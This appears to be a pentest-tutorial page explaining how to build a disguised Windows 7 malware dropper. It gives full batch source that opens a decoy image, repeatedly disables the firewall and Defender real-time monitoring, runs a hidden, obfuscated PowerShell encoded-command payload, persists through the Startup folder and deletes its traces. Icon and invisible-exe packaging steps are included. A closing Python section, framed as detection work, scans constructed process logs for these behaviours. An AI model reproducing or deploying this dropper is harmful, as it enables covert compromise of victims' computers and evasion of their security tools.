28. Wlan Pentest Create Icon Preparing Payload Windows 7
----
Payload Concealment
1. Create an icon with Big J's Icon Maker; any icon maker will do.
2. Edit the f1 file first, pasting the payload from the original payload file (or the fi file edited earlier) between the quotes of 'INSERT-HERE', under the :A block.
3. Create a new folder named "e" next to the bat files to hold the exe files built with the Bat To Exe converter covered in the earlier LAN pentesting videos.
4. Convert f.bat first, as an invisible 64-bit exe, with %appdata% set as the working directory.
5. Then convert f1.bat to an invisible 64-bit exe: working directory %appdata%, overwrite enabled, embedded items extracted to %appdata%, and embed the f.exe just built.
6. Then convert af.bat to an invisible 64-bit exe: working directory %appdata%, an icon chosen for the file, embedded items extracted to %appdata%, and overwrite set to yes. Embed "zombie.PNG" and "f1.exe" (f1.exe already carries f.exe inside it, so f.exe need not be included again).
7. This payload is built for a Windows 7 PC. For Windows 10 it would need administrative privileges, as in the earlier LAN pentesting video, so that it can disable Windows 10 protection. Note that the Defender cmdlet Set-MpPreference is not part of a stock Windows 7 install, so that line only has an effect on newer Windows; on Windows 7 the firewall line is the one that matters, and it too needs an elevated context.
8. "File.exe" (the exe built from af.bat) is what the target clicks; it initiates the connection from the target PC back to the Linux attacker machine.
9. Once double-clicked, it opens zombie.PNG for the user and runs f1.exe in the background.
10. f.exe stays dormant until the user restarts the PC; it then removes f1.exe from the target's %appdata% folder.
The video is sped up at this point; it navigates to the folder the files were extracted to, to show how everything works.
Contents of fi.bat file
=*=
- Code:
@echo off & powershell -w 1 -C "sv x -;sv ZO ec;sv h ((gv x).value.toString()+(gv ZO).value.toString());powershell (gv h).value.toString() 'INSERT-HERE'" > nul
exit
af.bat file contents. This is the first and main file: it eventually contains all of the other exe files built with Bat To Exe, and it is in charge of disabling (or bypassing) protection on 64-bit Windows 7 systems; it will not work on 32-bit Windows 7. It repeats the firewall-off and Defender-off commands ten times, ten seconds apart, before launching f1.exe; both commands require an elevated (administrator) context and fail silently otherwise, because the 2> nul redirect swallows the error.
=*=
- Code:
@echo off
if not DEFINED IS_MINIMIZED set IS_MINIMIZED=1 && start "" /min "%~dpnx0" %* && exit
taskkill /im f1.exe /f
timeout /t 01 > nul
start "" "%appdata%\zombie.png"
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
"%appdata%\f1.exe" 2> nul
exit
f1.bat file contents. This bat file is the one that actually holds your payload, in the 'INSERT-HERE' slot under the :A block. The :A one-liner assembles the string "-ec" at run time and hands it to a second powershell, so the slot takes a Base64-encoded command (what -EncodedCommand expects), not plain PowerShell. Note that %date:~4,5% assumes the US short-date format (e.g. "Sun 03/02/2020"), so the :A branch only runs on the hard-coded 03/02; on any other day the script takes the :B branch and just launches f.exe from the Startup folder.
=*=
- Code:
@echo off
taskkill /im powershell.exe /f 2> nul
timeout /t 02
move "%appdata%\f.exe" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\f.exe"
:Begin
set t=%date:~4,5%
if "%t%"=="03/02" goto :A
if not "%t%"=="03/02" goto :B
timeout /t 02 > nul
:A
powershell -w 1 -C "sv x -;sv ZO ec;sv h ((gv x).value.toString()+(gv ZO).value.toString());powershell (gv h).value.toString() 'INSERT-HERE'" > nul
exit
:B
timeout /t 05
start "" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\f.exe" 2> nul
timeout /t 05
f.bat file contents. This bat file, launched from the Startup folder after the user restarts the computer, kills f1.exe and deletes it from %appdata%.
=*=
- Code:
@echo off
taskkill /im f1.exe /f 2> nul
taskkill /im powershell.exe /f
timeout /t 04 > nul
del "%appdata%\f1.exe" /q /s /f 2> nul
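The three batch files above leave a very recognisable trail in process-creation telemetry: the firewall being switched off, Set-MpPreference turning off real-time monitoring, a hidden-window powershell that spawns a second powershell with a run-time assembled "-ec", an executable run straight out of the %appdata% root, and an exe moved into the Startup folder. The following is an added detection example, not code from the page or the video: it scans a constructed, Sysmon-style "ts host Image=... CommandLine=..." log (the line layout, host names, paths and the placeholder Base64 string are all this example's own assumptions) for exactly those behaviours and flags a host once several of them appear together. Note that the parent powershell line never shows "-ec" on its own command line, which is why the encoded-command rule fires on the child process and a separate nested-powershell rule covers the parent.

```python
import re

# Constructed sample, not real telemetry: one Sysmon-style process-creation
# event per line, in an assumed "ts host Image=... CommandLine=..." layout.
# WS01 runs the af/f1/f chain from the page; WS02 is benign admin activity.
# "QUFBQUFBQUFBQUFBQUFB" is a placeholder (Base64 of "AAAAAAAAAAAAAAA"), not a payload.
SAMPLE_LOG = r"""
2024-03-02T09:00:01 WS01 Image=C:\Users\bob\AppData\Roaming\File.exe CommandLine="C:\Users\bob\AppData\Roaming\File.exe"
2024-03-02T09:00:02 WS01 Image=C:\Windows\System32\cmd.exe CommandLine=cmd /c taskkill /im f1.exe /f
2024-03-02T09:00:03 WS01 Image=C:\Windows\System32\netsh.exe CommandLine=netsh advfirewall set allprofiles state off
2024-03-02T09:00:04 WS01 Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine=powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true"
2024-03-02T09:00:05 WS01 Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine=powershell -w 1 -C "sv x -;sv ZO ec;sv h ((gv x).value.toString()+(gv ZO).value.toString());powershell (gv h).value.toString() 'QUFBQUFBQUFBQUFBQUFB'"
2024-03-02T09:00:06 WS01 Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine=powershell -ec QUFBQUFBQUFBQUFBQUFB
2024-03-02T09:00:07 WS01 Image=C:\Windows\System32\cmd.exe CommandLine=move "C:\Users\bob\AppData\Roaming\f.exe" "C:\Users\bob\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f.exe"
2024-03-02T09:15:00 WS02 Image=C:\Windows\System32\netsh.exe CommandLine=netsh advfirewall show allprofiles
2024-03-02T09:16:00 WS02 Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine=powershell -Command Get-MpPreference
"""

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+Image=(\S+)\s+CommandLine=(.*)$")

# (rule name, regex applied to the command line). Rule names are this example's own.
RULES = [
    ("firewall_disabled", r"netsh\s+advfirewall\s+set\s+\w+\s+state\s+off"),
    ("defender_rtm_disabled", r"Set-MpPreference\b.*-DisableRealtimeMonitoring\s+\$?true"),
    # -w 1 / -WindowStyle Hidden: window hidden from the user
    ("hidden_powershell", r"powershell(?:\.exe)?\b.*\s-w(?:indowstyle)?\s+(?:1|hidden)\b"),
    # -e / -ec / -enc / -EncodedCommand followed by a Base64 blob (the child process)
    ("encoded_command", r"powershell(?:\.exe)?\b.*\s-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}"),
    # powershell launching powershell, as the f1 one-liner does (the parent process)
    ("nested_powershell", r"powershell\b.*\bpowershell\b"),
    ("startup_folder_drop", r"\\Start Menu\\Programs\\Startup\\[^\\]+\.(?:exe|bat|vbs|lnk)\b"),
    # executable sitting directly in the AppData\Roaming root (%appdata%)
    ("exe_in_appdata_root", r"AppData\\Roaming\\[^\\\s\"']+\.exe\b"),
]
COMPILED = [(name, re.compile(rx, re.IGNORECASE)) for name, rx in RULES]


def parse_line(line):
    """Split one log line into its fields; None for lines that do not fit the layout."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, host, image, cmdline = m.groups()
    return {"ts": ts, "host": host, "image": image, "cmdline": cmdline}


def match_rules(cmdline):
    """Names of all rules that fire on a single command line, in RULES order."""
    return [name for name, rx in COMPILED if rx.search(cmdline)]


def scan(log_text):
    """Return (host, timestamp, rule) findings for every matching event."""
    findings = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        for rule in match_rules(ev["cmdline"]):
            findings.append((ev["host"], ev["ts"], rule))
    return findings


def rules_by_host(findings):
    """Map each host to the set of distinct rules that fired on it."""
    out = {}
    for host, _ts, rule in findings:
        out.setdefault(host, set()).add(rule)
    return out


def suspect_hosts(findings, min_rules=3):
    """Hosts on which at least min_rules distinct behaviours were seen together."""
    return sorted(h for h, rules in rules_by_host(findings).items() if len(rules) >= min_rules)


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for host, ts, rule in found:
        print(f"{ts} {host} {rule}")
    print("suspect hosts:", suspect_hosts(found))
```

Single rules such as nested_powershell or an exe in %appdata% are noisy on their own; the correlation in suspect_hosts is what turns them into a usable alert, and the threshold is a tuning knob for the environment. In a real deployment the same regexes would run over Sysmon Event ID 1 or Security 4688 command lines rather than the constructed text here.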